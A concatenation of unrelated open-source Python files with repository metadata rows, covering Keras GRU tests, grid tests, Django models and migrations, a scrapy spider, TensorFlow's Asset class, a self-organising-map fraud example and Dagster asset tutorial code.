out2 = model.predict(np.ones((num_samples, timesteps)))
# if the state is not reset, output should be different
self.assertNotEqual(out1.max(), out2.max())
# check that output changes after states are reset
# (even though the model itself didn't change)
layer.reset_states()
out3 = model.predict(np.ones((num_samples, timesteps)))
self.assertNotEqual(out2.max(), out3.max())
# check that container-level reset_states() works
model.reset_states()
out4 = model.predict(np.ones((num_samples, timesteps)))
np.testing.assert_allclose(out3, out4, atol=1e-5)
# check that the call to `predict` updated the states
out5 = model.predict(np.ones((num_samples, timesteps)))
self.assertNotEqual(out4.max(), out5.max())
# Check masking
layer.reset_states()
left_padded_input = np.ones((num_samples, timesteps))
left_padded_input[0, :1] = 0
left_padded_input[1, :2] = 0
out6 = model.predict(left_padded_input)
layer.reset_states()
right_padded_input = np.ones((num_samples, timesteps))
right_padded_input[0, -1:] = 0
right_padded_input[1, -2:] = 0
out7 = model.predict(right_padded_input)
np.testing.assert_allclose(out7, out6, atol=1e-5)
def test_regularizers_GRU(self):
embedding_dim = 4
layer_class = keras.layers.GRU
with self.test_session():
layer = layer_class(
5,
return_sequences=False,
weights=None,
input_shape=(None, embedding_dim),
kernel_regularizer=keras.regularizers.l1(0.01),
recurrent_regularizer=keras.regularizers.l1(0.01),
bias_regularizer='l2',
activity_regularizer='l1')
layer.build((None, None, 2))
self.assertEqual(len(layer.losses), 3)
x = keras.backend.variable(np.ones((2, 3, 2)))
layer(x)
self.assertEqual(len(layer.get_losses_for(x)), 1)
def test_constraints_GRU(self):
embedding_dim = 4
layer_class = keras.layers.GRU
with self.test_session():
k_constraint = keras.constraints.max_norm(0.01)
r_constraint = keras.constraints.max_norm(0.01)
b_constraint = keras.constraints.max_norm(0.01)
layer = layer_class(
5,
return_sequences=False,
weights=None,
input_shape=(None, embedding_dim),
kernel_constraint=k_constraint,
recurrent_constraint=r_constraint,
bias_constraint=b_constraint)
layer.build((None, None, embedding_dim))
self.assertEqual(layer.cell.kernel.constraint, k_constraint)
self.assertEqual(layer.cell.recurrent_kernel.constraint, r_constraint)
self.assertEqual(layer.cell.bias.constraint, b_constraint)
def test_with_masking_layer_GRU(self):
layer_class = keras.layers.GRU
with self.test_session():
inputs = np.random.random((2, 3, 4))
targets = np.abs(np.random.random((2, 3, 5)))
targets /= targets.sum(axis=-1, keepdims=True)
model = keras.models.Sequential()
model.add(keras.layers.Masking(input_shape=(3, 4)))
model.add(layer_class(units=5, return_sequences=True, unroll=False))
model.compile(loss='categorical_crossentropy', optimizer='adam')
model.fit(inputs, targets, epochs=1, batch_size=2, verbose=1)
def test_from_config_GRU(self):
layer_class = keras.layers.GRU
for stateful in (False, True):
l1 = layer_class(units=1, stateful=stateful)
l2 = layer_class.from_config(l1.get_config())
assert l1.get_config() == l2.get_config()
if __name__ == '__main__':
test.main()
| [
"zylo117@hotmail.com"
] | zylo117@hotmail.com |
7f6219a3f5413f7f8ccc9a6748aee73c9408722c | 8cb5b2e2a84252403ca2cd271c4a227eba1ae003 | /test_grid.py | c0800c9d451513546124d95ce0cedd82e442a760 | [] | no_license | barnybug/aoc2018 | e2e972e984b807bae55ca0914de2fbb197ac8a91 | a98d8992ccc4a7cc3d49084fb179665ff5bba605 | refs/heads/master | 2020-04-09T07:29:54.204975 | 2019-01-07T20:18:30 | 2019-01-07T20:18:30 | 160,158,332 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 973 | py | import collections
from grid import DenseGrid, SparseGrid
def test_empty_grid():
g = DenseGrid()
assert str(g) == ''
def test_grid_set():
g = DenseGrid()
g[1,1] = 'A'
assert str(g) == 'A'
g[2,1] = 'B'
assert str(g) == 'AB'
g[2,2] = 'C'
assert str(g) == 'AB\n.C'
g[-1,1] = 'Z'
assert str(g) == 'Z.AB\n...C'
def test_grid_set():
g = SparseGrid()
g[1,1] = 'A'
assert str(g) == 'A'
g[2,1] = 'B'
assert str(g) == 'AB'
g[2,2] = 'C'
assert str(g) == 'AB\n.C'
g[-1,1] = 'Z'
assert str(g) == 'Z.AB\n...C'
def test_grid_area():
g = SparseGrid()
g[1,1] = 'A'
assert g.area() == 1
g[2,1] = 'B'
assert g.area() == 2
g[2,2] = 'C'
assert g.area() == 4
g[-1,1] = 'Z'
assert g.area() == 8
def test_grid_count():
g = SparseGrid()
g[1,1] = 'A'
g[2,2] = 'A'
g[2,1] = 'B'
assert g.count() == collections.Counter({'A': 2, 'B': 1})
| [
"barnaby@pickle.me.uk"
] | barnaby@pickle.me.uk |
8543373d98c1f04b791fbc898524b98731cd31c2 | 490fad8eb8856c16b3d1d2e1ac3d00f5bd1280ba | /langsea/managers/category_manager.py | 5e1600baac8d6797c904a7ef17ec7107403b641f | [
"MIT"
] | permissive | blancheta/langsea | ebd12b16ff1b36d4292f527ec58f23b93deecbe7 | e268b43fb94e3234ac161f2e5d9600d51360e4b3 | refs/heads/master | 2020-12-25T14:14:49.029568 | 2016-08-20T16:31:00 | 2016-08-20T16:31:00 | 66,143,438 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 591 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
from langsea.models.category import Category
class CategoryManager:
categories_api_url = 'http://www.langsea.org/api/categories/'
def all(self):
response = requests.get(self.categories_api_url)
if response.ok:
categories = []
for category_json in response.json():
categories.append(Category(*category_json))
return categories
def get(self, name):
response = requests.get(self.categories_api_url + name)
category = None
if response.ok:
category = Category(*response.json())
return category
| [
"alexandreblanchet44@gmail.com"
] | alexandreblanchet44@gmail.com |
059440aacffa1c8f20a8b2ab1a4509ae258fd1a7 | 3bf32bd11cb1a9d52eb40e89d0cca3ff00b8f11f | /catalog/migrations/0004_auto_20200908_1443.py | cb2d06b580abe94c245df3cd2945c19749d55c06 | [] | no_license | poojabankapur/my_django_project | 8c608933e21ceed8e7f8dcc8d37274ebaa22435b | 1a9d7dce7b1e4ff0b3052f20b67a5c5e6a59f212 | refs/heads/master | 2022-12-12T06:23:06.398165 | 2020-09-14T10:08:54 | 2020-09-14T10:08:54 | 294,719,173 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 432 | py | # Generated by Django 3.1.1 on 2020-09-08 13:43
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('catalog', '0003_bookinstance_borrower'),
]
operations = [
migrations.AlterModelOptions(
name='author',
options={'ordering': ['last_name', 'first_name'], 'permissions': (('can_mark_returned', 'Set book as returned'),)},
),
]
| [
"pbankapur@ICTs-MacBook-Pro.local"
] | pbankapur@ICTs-MacBook-Pro.local |
fc0a6b47b61e7204041f443dd3d55ac34db67122 | 7181e3d99d12a52ae77235bc2558b4a142e22aa6 | /7/wangpeng/trans/main.py | ede9e408a846dde83206e7a664536143334de01c | [
"Apache-2.0"
] | permissive | ywang412/homework-arch-4 | 2ede97e1fb400744e7108b8f9c44c3eb77b21324 | 4182448356f875398d2a2ac34092d876261e3078 | refs/heads/master | 2021-05-09T20:02:19.520761 | 2015-08-06T04:53:13 | 2015-08-06T04:53:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 786 | py | #!/usr/bin/env python
# coding=utf-8
import sys, os
import MySQLdb as mysql
import json
import hashlib
sys.path.insert(1, os.path.join(sys.path[0], '..'))
from simpleNet.nbNetFramework import nbNet, sendData_mh
save_l = ["localhost:9650", "127.0.0.1:9650"]
ff_l = ["localhost:9652", "127.0.0.1:9652"]
saver_sock_l = [None]
ff_sock_l = [None]
def sendSaver(d_in, saver_l):
return sendData_mh(saver_sock_l, saver_l, d_in)
def sendFf(d_in, saver_l):
return sendData_mh(ff_sock_l, ff_l, d_in)
if __name__ == '__main__':
def logic(d_in):
sendFf(d_in, ff_l)
ret = sendSaver(d_in, save_l)
if ret:
return("OK")
else:
return("ER")
return("OK")
transD = nbNet('0.0.0.0', 9651, logic)
transD.run()
| [
"pengwang18@163.com"
] | pengwang18@163.com |
342faa074eb53a041843400d7c3e767d4ba98c72 | 96c199298bb00724463dcc66ccf887008b76a9d0 | /py_pairing-master/tests/test_bn128.py | 232d20adaea0f56644df789aa2d2ad4ea4e7e4c9 | [
"MIT"
] | permissive | Yuki23329626/bilinear_pairing | 6853d93ffd93811802bce4e1f220e430707ffe7a | b5d937668bfb6794ccb612f368ae5b5221aa1e4d | refs/heads/master | 2023-04-15T05:55:17.417321 | 2021-04-20T05:19:35 | 2021-04-20T05:19:35 | 355,343,351 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,336 | py | import time
from py_ecc import bn128, optimized_bn128
print('Starting bn128 tests')
for lib in (bn128, optimized_bn128):
FQ, FQ2, FQ12, field_modulus = lib.FQ, lib.FQ2, lib.FQ12, lib.field_modulus
assert FQ(2) * FQ(2) == FQ(4)
assert FQ(2) / FQ(7) + FQ(9) / FQ(7) == FQ(11) / FQ(7)
assert FQ(2) * FQ(7) + FQ(9) * FQ(7) == FQ(11) * FQ(7)
assert FQ(9) ** field_modulus == FQ(9)
print('FQ works fine')
x = FQ2([1, 0])
f = FQ2([1, 2])
fpx = FQ2([2, 2])
one = FQ2.one()
assert x + f == fpx
assert f / f == one
assert one / f + x / f == (one + x) / f
assert one * f + x * f == (one + x) * f
assert x ** (field_modulus ** 2 - 1) == one
print('FQ2 works fine')
x = FQ12([1] + [0] * 11)
f = FQ12([1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12])
fpx = FQ12([2, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12])
one = FQ12.one()
assert x + f == fpx
assert f / f == one
assert one / f + x / f == (one + x) / f
assert one * f + x * f == (one + x) * f
# This check takes too long
# assert x ** (field_modulus ** 12 - 1) == one
print('FQ12 works fine')
G1, G2, G12, b, b2, b12, is_inf, is_on_curve, eq, add, double, curve_order, multiply = \
lib.G1, lib.G2, lib.G12, lib.b, lib.b2, lib.b12, lib.is_inf, lib.is_on_curve, lib.eq, lib.add, lib.double, lib.curve_order, lib.multiply
assert eq(add(add(double(G1), G1), G1), double(double(G1)))
assert not eq(double(G1), G1)
assert eq(add(multiply(G1, 9), multiply(G1, 5)), add(multiply(G1, 12), multiply(G1, 2)))
assert is_inf(multiply(G1, curve_order))
print('G1 works fine')
assert eq(add(add(double(G2), G2), G2), double(double(G2)))
assert not eq(double(G2), G2)
assert eq(add(multiply(G2, 9), multiply(G2, 5)), add(multiply(G2, 12), multiply(G2, 2)))
assert is_inf(multiply(G2, curve_order))
assert not is_inf(multiply(G2, 2 * field_modulus - curve_order))
assert is_on_curve(multiply(G2, 9), b2)
print('G2 works fine')
assert eq(add(add(double(G12), G12), G12), double(double(G12)))
assert not eq(double(G12), G12)
assert eq(add(multiply(G12, 9), multiply(G12, 5)), add(multiply(G12, 12), multiply(G12, 2)))
assert is_on_curve(multiply(G12, 9), b12)
assert is_inf(multiply(G12, curve_order))
print('G12 works fine')
pairing, neg = lib.pairing, lib.neg
print('Starting pairing tests')
a = time.time()
p1 = pairing(G2, G1)
pn1 = pairing(G2, neg(G1))
assert p1 * pn1 == FQ12.one()
print('Pairing check against negative in G1 passed')
np1 = pairing(neg(G2), G1)
assert p1 * np1 == FQ12.one()
assert pn1 == np1
print('Pairing check against negative in G2 passed')
assert p1 ** curve_order == FQ12.one()
print('Pairing output has correct order')
p2 = pairing(G2, multiply(G1, 2))
assert p1 * p1 == p2
print('Pairing bilinearity in G1 passed')
assert p1 != p2 and p1 != np1 and p2 != np1
print('Pairing is non-degenerate')
po2 = pairing(multiply(G2, 2), G1)
assert p1 * p1 == po2
print('Pairing bilinearity in G2 passed')
p3 = pairing(multiply(G2, 27), multiply(G1, 37))
po3 = pairing(G2, multiply(G1, 999))
assert p3 == po3
print('Composite check passed')
print('Total time for pairings: %.3f' % (time.time() - a))
| [
"michael7105@gmail.com"
] | michael7105@gmail.com |
a4e0b6eb057702056e41fe66f4ad49f9ee4bbfe4 | 520908cb844d4f26e06c36675a0aeecd1d428942 | /teachDRL/gan/maze_generators/pacman_blocks.py | 5fc2f0f55a0d6e92713be664df66a80ccd46c1cf | [
"MIT"
] | permissive | pierreosselin/teachDeepRL | 713e3b2273aafbb4adcf562f745c69854c59b808 | 51b512ce17a271a63b4d8b0780850511eb008750 | refs/heads/master | 2023-08-14T23:47:27.575306 | 2021-09-23T20:37:36 | 2021-09-23T20:37:36 | 395,716,623 | 1 | 0 | MIT | 2021-08-13T16:13:20 | 2021-08-13T16:13:18 | null | UTF-8 | Python | false | false | 5,792 | py | import numpy as np
import random
rectangle3x3 = np.array([[1, 1, 1],
[1, 2, 1],
[1, 1, 1]])
rectangle2x5 = np.array([[1, 1, 1, 1],
[1, 2, 2, 1],
[1, 1, 1, 1]])
rectangle5x2 = np.transpose(rectangle2x5)
rectangle3x5 = np.array([[1, 1, 1, 1, 1],
[1, 2, 2, 2, 1],
[1, 1, 1, 1, 1]])
rectangle5x3 = np.transpose(rectangle3x5)
rectangle4x5 = np.array([[1, 1, 1, 1, 1, 1],
[1, 2, 2, 2, 2, 1],
[1, 1, 1, 1, 1, 1]])
rectangle5x4 = np.transpose(rectangle4x5)
L_up_right = np.array([[1, 1, 1, 1, 1],
[1, 2, 1, 1, 1],
[1, 2, 2, 2, 1],
[1, 1, 1, 1, 1]])
L_up_left = np.flip(L_up_right, 1)
L_down_right = np.flip(L_up_right, 0)
L_down_left = np.flip(L_up_left, 0)
L_transpose_up_right = np.transpose(L_up_right)
L_transpose_up_left = np.transpose(L_up_right)
L_transpose_down_right = np.transpose(L_down_right)
L_transpose_down_left = np.transpose(L_down_right)
L_long_up_right = np.array([[1, 1, 1, 1, 1, 1],
[1, 2, 1, 1, 1, 1],
[1, 2, 2, 2, 2, 1],
[1, 1, 1, 1, 1, 1]])
L_long_up_left = np.flip(L_long_up_right, 1)
L_long_down_right = np.flip(L_long_up_right, 0)
L_long_down_left = np.flip(L_long_up_left, 0)
L_long_transpose_up_right = np.transpose(L_long_up_right)
L_long_transpose_up_left = np.transpose(L_long_up_right)
L_long_transpose_down_right = np.transpose(L_long_down_right)
L_long_transpose_down_left = np.transpose(L_long_down_right)
T_up = np.array([[1, 1, 1, 1, 1],
[1, 1, 2, 1, 1],
[1, 2, 2, 2, 1],
[1, 1, 1, 1, 1]])
T_left = np.transpose(T_up)
T_down = np.flip(T_up, 0)
T_right = np.transpose(T_down)
T_long_up_right = np.array([[1, 1, 1, 1, 1, 1],
[1, 1, 2, 1, 1, 1],
[1, 2, 2, 2, 2, 1],
[1, 1, 1, 1, 1, 1]])
T_long_up_left = np.flip(T_long_up_right, 1)
T_long_down_right = np.flip(T_long_up_right, 0)
T_long_down_left = np.flip(T_long_up_left, 0)
T_long_transpose_up_right = np.transpose(T_long_up_right)
T_long_transpose_up_left = np.transpose(T_long_up_right)
T_long_transpose_down_right = np.transpose(T_long_down_right)
T_long_transpose_down_left = np.transpose(T_long_down_right)
T_short_up_right = np.array([[1, 1, 1, 1],
[1, 2, 1, 1],
[1, 2, 2, 1],
[1, 1, 1, 1]])
T_short_up_left = np.flip(T_short_up_right, 1)
T_short_down_right = np.flip(T_short_up_right, 0)
T_short_down_left = np.flip(T_short_up_left, 0)
T_short_transpose_up_right = np.transpose(T_short_up_right)
T_short_transpose_up_left = np.transpose(T_short_up_right)
T_short_transpose_down_right = np.transpose(T_short_down_right)
T_short_transpose_down_left = np.transpose(T_short_down_right)
S_up = np.array([[1, 1, 1, 1, 1],
[1, 2, 2, 1, 1],
[1, 1, 2, 2, 1],
[1, 1, 1, 1, 1]])
S_left = np.transpose(S_up)
S_down = np.flip(S_up, 0)
S_right = np.transpose(S_down)
S_long_up_right = np.array([[1, 1, 1, 1, 1, 1],
[1, 1, 2, 1, 1, 1],
[1, 2, 2, 2, 2, 1],
[1, 1, 1, 1, 1, 1]])
S_long_up_left = np.flip(S_long_up_right, 1)
S_long_down_right = np.flip(S_long_up_right, 0)
S_long_down_left = np.flip(S_long_up_left, 0)
S_long_transpose_up_right = np.transpose(S_long_up_right)
S_long_transpose_up_left = np.transpose(S_long_up_right)
S_long_transpose_down_right = np.transpose(S_long_down_right)
S_long_transpose_down_left = np.transpose(S_long_down_right)
all_blocks = [#rectangle3x3, rectangle2x5, rectangle5x2, rectangle5x3, rectangle5x3, rectangle5x4, rectangle5x4,
L_up_right, L_up_left, L_down_right, L_down_left,
L_transpose_up_right, L_transpose_up_left, L_transpose_down_right, L_transpose_down_left,
L_long_up_right, L_long_up_left, L_long_down_right, L_long_down_left,
L_long_transpose_up_right, L_long_transpose_up_left, L_long_transpose_down_right, L_long_transpose_down_left,
T_up, T_left, T_down, T_right, S_up, S_left, S_down, S_right,
T_long_up_right, T_long_up_left, T_long_down_right, T_long_down_left,
T_long_transpose_up_right, T_long_transpose_up_left, T_long_transpose_down_right, T_long_transpose_down_left,
T_short_up_right, T_short_up_left, T_short_down_right, T_short_down_left,
T_short_transpose_up_right, T_short_transpose_up_left, T_short_transpose_down_right, T_short_transpose_down_left,
S_long_up_right, S_long_up_left, S_long_down_right, S_long_down_left,
S_long_transpose_up_right, S_long_transpose_up_left, S_long_transpose_down_right, S_long_transpose_down_left,]
class PacmanBlock():
def __init__(self, dense=True):
self.blocks = all_blocks
if dense:
self.blocks = [block for block in self.blocks]
self.num_blocks = len(self.blocks)
def get_block(self, shape_max = None):
if shape_max is not None:
blocks = [block for block in self.blocks if block.shape[0] <= shape_max[0] and block.shape[1] <= shape_max[1]]
else:
blocks = self.blocks
if len(blocks) == 0:
return None
block = random.choice(blocks)
block = random.choice([block[:-1, :], block[:, 1:]])
return block
if __name__ == '__main__':
p = PacmanBlock()
print(p.get_block())
print(p.get_block(shape_max = (3,3)))
| [
"pierre.osselin@gmail.com"
] | pierre.osselin@gmail.com |
c4d0070b71718c580c72e76d286979f11962b509 | bab394bc828702663baef346fe65e3cbe592121e | /get_id.py | 410448e820bbd61217022470dd8194ef382d0d92 | [] | no_license | hilting/9sig | 79ba22ac377f630a440e6424f5f98f49ccdbe7bf | 1b4390206d9d9d4277687083d5447bede1b00fcd | refs/heads/master | 2020-03-06T14:16:59.440043 | 2018-05-10T07:05:05 | 2018-05-10T07:05:05 | 126,932,995 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 556 | py | # coding: utf-8
import urllib.request
from xml.etree.ElementTree import *
def get_id(url):#論文IDを取得する
result = urllib.request.urlopen(url)
return result
def main():
keyword = "all[filter]"
baseURL = "http://eutils.ncbi.nlm.nih.gov/entrez/eutils/esearch.fcgi?db=pubmed&retmax=28389011&term="
url = baseURL + keyword
result = get_id(url)
element = fromstring(result.read())
filename = "idlist_"+keyword+".txt"
for e in element.findall(".//Id"):
print (e.text)
if __name__ == "__main__":
main()
| [
"to1216goo@gmail.com"
] | to1216goo@gmail.com |
d3270efae30d0bd295cd3e3f2a19feb5ea441aca | 719fd713fbe76af8d7a957ceb3f8857daeeca2cd | /users/models.py | 8b0e1f4375bd40b00e375b3ceb0529b3d7ba176d | [] | no_license | geraldbryan/DayDreams | bf6a6008fc64012bfbd72a02feaffb8de53507c8 | 1408b4eb54147e676d25ad27701f21b70fdb7ddc | refs/heads/master | 2023-06-07T08:31:32.891910 | 2021-07-09T08:41:42 | 2021-07-09T08:41:42 | 384,371,163 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 620 | py | from django.db import models
from django.contrib.auth.models import User
from PIL import Image
class Profile(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE)
image = models.ImageField(default='default.jpg',upload_to='profile_pics')
def __str__(self):
return f'{self.user.username} Profile'
def save(self, *args, **kwargs):
super().save(*args, **kwargs)
img = Image.open(self.image.path)
if img.height > 300 or img.width > 300:
output_size = (300,300)
img.thumbnail(output_size)
img.save(self.image.path)
| [
"geraldbryan9914@gmail.com"
] | geraldbryan9914@gmail.com |
f2baaf3156daf238102ec6521a31dcbcc7642cee | e344705eb6b8bae2e06cd658f540219f8b6e7973 | /baidubaike/baike/spiders/swg.py | 371bfbaef8481e3c4ee900d995b1ab173d8d4702 | [] | no_license | dustw/my-scrapy | 023211f1d32b2883ef58249ec528ec15658db86d | 7263680cfa16e2615187b745c97fbc3cacf3780a | refs/heads/master | 2020-04-11T21:13:45.622353 | 2017-08-23T02:49:31 | 2017-08-23T02:49:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 944 | py |
# -*- coding: utf-8 -*-
import scrapy
from baike.items import SWGItem
class SwgSpider(scrapy.Spider):
name = "swg"
allowed_domains = ["chazidian.com"]
def start_requests(self):
for i in range(1, 64):
url = "https://www.chazidian.com/kepu-1/%s/"
url %= str(i)
yield scrapy.Request(url=url, callback=self.parse)
def parse(self, response):
info_urls = response.xpath("//ul[@class='common']//li//a/@href").extract()
for each in info_urls:
yield scrapy.Request(url=each, callback=self.parse_item)
def parse_item(self, response):
print(response.url)
question = response.xpath("//span[@id='print_title']//text()").extract()[0]
answer = "".join(response.xpath("//div[@id='print_content']/p/text()").extract()).strip()
item = SWGItem()
item['question'] = question
item['answer'] = answer
yield item | [
"azraelkuan@gmail.com"
] | azraelkuan@gmail.com |
1721190f8b16788f28f27201dfa5c446cc4a8387 | 45983984d5c2b655e2e3b13538e3c93993c41649 | /fourm/migrations/0003_auto_20200518_1646.py | 232abdad560d2bcf24fef31b28808627053cf7da | [] | no_license | Code-Institute-Submissions/reddevil-it | 14c172ddd13c2796250108221b9dafe67306eff3 | 57dc4561382086cd7847058cc6f754c24c04316d | refs/heads/master | 2022-11-16T10:59:26.757803 | 2020-07-03T20:48:58 | 2020-07-03T20:48:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 446 | py | # Generated by Django 3.0.6 on 2020-05-18 15:46
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('fourm', '0002_comment'),
]
operations = [
migrations.AlterModelOptions(
name='comment',
options={'ordering': ['-created_date']},
),
migrations.RemoveField(
model_name='comment',
name='author',
),
]
| [
"plyn99@gmail.com"
] | plyn99@gmail.com |
17155a2faf01fd4d1b8ef2bd64c48e450adac8c7 | 8aa04db29bae5e0391543349eb2c0f778c56ffae | /tensorflow/python/trackable/asset.py | c218f7240e4f29d6e95140050581981776c3b287 | [
"Apache-2.0",
"LicenseRef-scancode-generic-cla",
"BSD-2-Clause"
] | permissive | mansnils/tensorflow | ec1a840f8fca6742d6e54dcf7b00eae0180f4023 | b0164f014fd4f1b5af2c7b578aa7687198c5d92e | refs/heads/master | 2023-01-30T00:13:07.772844 | 2023-01-09T09:45:45 | 2023-01-09T09:49:49 | 226,075,754 | 1 | 0 | Apache-2.0 | 2019-12-05T10:27:38 | 2019-12-05T10:27:37 | null | UTF-8 | Python | false | false | 4,278 | py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Asset-type Trackable object."""
import os
from tensorflow.python.eager import context
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.lib.io import file_io
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.saved_model import path_helpers
from tensorflow.python.trackable import base
from tensorflow.python.util.tf_export import tf_export
@tf_export("saved_model.Asset")
class Asset(base.Trackable):
"""Represents a file asset to hermetically include in a SavedModel.
A SavedModel can include arbitrary files, called assets, that are needed
for its use. For example a vocabulary file used initialize a lookup table.
When a trackable object is exported via `tf.saved_model.save()`, all the
`Asset`s reachable from it are copied into the SavedModel assets directory.
Upon loading, the assets and the serialized functions that depend on them
will refer to the correct filepaths inside the SavedModel directory.
Example:
```
filename = tf.saved_model.Asset("file.txt")
@tf.function(input_signature=[])
def func():
return tf.io.read_file(filename)
trackable_obj = tf.train.Checkpoint()
trackable_obj.func = func
trackable_obj.filename = filename
tf.saved_model.save(trackable_obj, "/tmp/saved_model")
# The created SavedModel is hermetic, it does not depend on
# the original file and can be moved to another path.
tf.io.gfile.remove("file.txt")
tf.io.gfile.rename("/tmp/saved_model", "/tmp/new_location")
reloaded_obj = tf.saved_model.load("/tmp/new_location")
print(reloaded_obj.func())
```
Attributes:
asset_path: A path, or a 0-D `tf.string` tensor with path to the asset.
"""
def __init__(self, path):
"""Record the full path to the asset."""
if isinstance(path, os.PathLike):
path = os.fspath(path)
# The init_scope prevents functions from capturing `path` in an
# initialization graph, since it is transient and should not end up in a
# serialized function body.
with ops.init_scope(), ops.device("CPU"):
self._path = ops.convert_to_tensor(
path, dtype=dtypes.string, name="asset_path")
@property
def asset_path(self):
"""Fetch the current asset path."""
return self._path
@classmethod
def _deserialize_from_proto(cls, object_proto, export_dir, asset_file_def,
**unused_kwargs):
proto = object_proto.asset
filename = file_io.join(
path_helpers.get_assets_dir(export_dir),
asset_file_def[proto.asset_file_def_index].filename)
asset = cls(filename)
if not context.executing_eagerly():
ops.add_to_collection(ops.GraphKeys.ASSET_FILEPATHS, asset.asset_path)
return asset
def _add_trackable_child(self, name, value):
setattr(self, name, value)
def _export_to_saved_model_graph(self, tensor_map, **unused_kwargs):
# TODO(b/205008097): Instead of mapping 1-1 between trackable asset
# and asset in the graph def consider deduping the assets that
# point to the same file.
asset_path_initializer = array_ops.placeholder(
shape=self.asset_path.shape,
dtype=dtypes.string,
name="asset_path_initializer")
asset_variable = resource_variable_ops.ResourceVariable(
asset_path_initializer)
tensor_map[self.asset_path] = asset_variable
return [self.asset_path]
ops.register_tensor_conversion_function(
Asset, lambda asset, **kw: ops.convert_to_tensor(asset.asset_path, **kw))
| [
"gardener@tensorflow.org"
] | gardener@tensorflow.org |
2b088e0ff1d83996a411c99f34c71c0535824b69 | 739ed6d193d5d524777d88dbebb0dd86b09a0002 | /04_Self_Organizing_Maps/som2.py | 53a8f33246f74e820ef8ca892e44938a6a657320 | [] | no_license | gnzeleven/Introduction-to-Deep-Learning | 0480963ea4b722a310d180c7d66ff53db9cbf5d5 | dbf5db18b7c8e77562bbbeb9a51c675b8b946665 | refs/heads/master | 2022-04-26T15:26:02.973164 | 2020-04-29T07:32:17 | 2020-04-29T07:32:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,099 | py | # -*- coding: utf-8 -*-
import numpy as np
import pandas as pd
# Import the dataset
df = pd.read_csv("Credit_Card_Applications.csv")
X = df.iloc[:,:-1].values
y = df.iloc[:,-1].values
# Feature Scaling
from sklearn.preprocessing import MinMaxScaler
scaler = MinMaxScaler(feature_range=(0,1))
X = scaler.fit_transform(X)
# Training the SOM
from minisom import MiniSom
som_model = MiniSom(x=10, y=10, input_len=15, sigma=1.0, learning_rate=0.5)
som_model.random_weights_init(X)
som_model.train_random(data=X, num_iteration=200)
# Visualizing the results
from pylab import bone, pcolor, colorbar, plot, show
bone()
pcolor(som_model.distance_map().T)
colorbar()
markers = ['o','s']
colors = ['r','g']
for i,x in enumerate(X):
w = som_model.winner(x)
plot(w[0]+0.5,
w[1]+0.5,
markers[y[i]],
markeredgecolor=colors[y[i]],
markerfacecolor='None',
markersize=10,
markeredgewidth=2)
show()
# Cherry-picking the frauds
mappings = som_model.win_map(X)
likely_frauds = mappings[(8,5)]
likely_frauds = scaler.inverse_transform(likely_frauds)
| [
"vsav4796@gmail.com"
] | vsav4796@gmail.com |
4befe135006f88eaa43f75a4a79d805a6d066eaa | 6188f8ef474da80c9e407e8040de877273f6ce20 | /examples/docs_snippets/docs_snippets/guides/dagster/asset_tutorial/non_argument_deps.py | 9d15421d4ee2978a194a43bb4d650ad0f3abb1eb | [
"Apache-2.0"
] | permissive | iKintosh/dagster | 99f2a1211de1f3b52f8bcf895dafaf832b999de2 | 932a5ba35263deb7d223750f211c2ddfa71e6f48 | refs/heads/master | 2023-01-24T15:58:28.497042 | 2023-01-20T21:51:35 | 2023-01-20T21:51:35 | 276,410,978 | 1 | 0 | Apache-2.0 | 2020-07-01T15:19:47 | 2020-07-01T15:13:56 | null | UTF-8 | Python | false | false | 2,104 | py | """isort:skip_file"""
import csv
import requests
from dagster import asset
@asset
def cereals():
response = requests.get("https://docs.dagster.io/assets/cereal.csv")
lines = response.text.split("\n")
return [row for row in csv.DictReader(lines)]
@asset
def nabisco_cereals(cereals):
"""Cereals manufactured by Nabisco"""
return [row for row in cereals if row["mfr"] == "N"]
@asset
def cereal_protein_fractions(cereals):
"""
For each cereal, records its protein content as a fraction of its total mass.
"""
result = {}
for cereal in cereals:
total_grams = float(cereal["weight"]) * 28.35
result[cereal["name"]] = float(cereal["protein"]) / total_grams
return result
@asset
def highest_protein_nabisco_cereal(nabisco_cereals, cereal_protein_fractions):
"""
The name of the nabisco cereal that has the highest protein content.
"""
sorted_by_protein = sorted(
nabisco_cereals, key=lambda cereal: cereal_protein_fractions[cereal["name"]]
)
return sorted_by_protein[-1]["name"]
# cereal_ratings_zip_start
import urllib.request
@asset
def cereal_ratings_zip() -> None:
urllib.request.urlretrieve(
"https://dagster-git-tutorial-nothing-elementl.vercel.app/assets/cereal-ratings.csv.zip",
"cereal-ratings.csv.zip",
)
# cereal_ratings_zip_end
# cereal_ratings_csv_start
import zipfile
@asset(non_argument_deps={"cereal_ratings_zip"})
def cereal_ratings_csv() -> None:
with zipfile.ZipFile("cereal-ratings.csv.zip", "r") as zip_ref:
zip_ref.extractall(".")
# cereal_ratings_csv_end
# nabisco_cereal_ratings_start
@asset(non_argument_deps={"cereal_ratings_csv"})
def nabisco_cereal_ratings(nabisco_cereals):
with open("cereal-ratings.csv", "r") as f:
cereal_ratings = {
row["name"]: row["rating"] for row in csv.DictReader(f.readlines())
}
result = {}
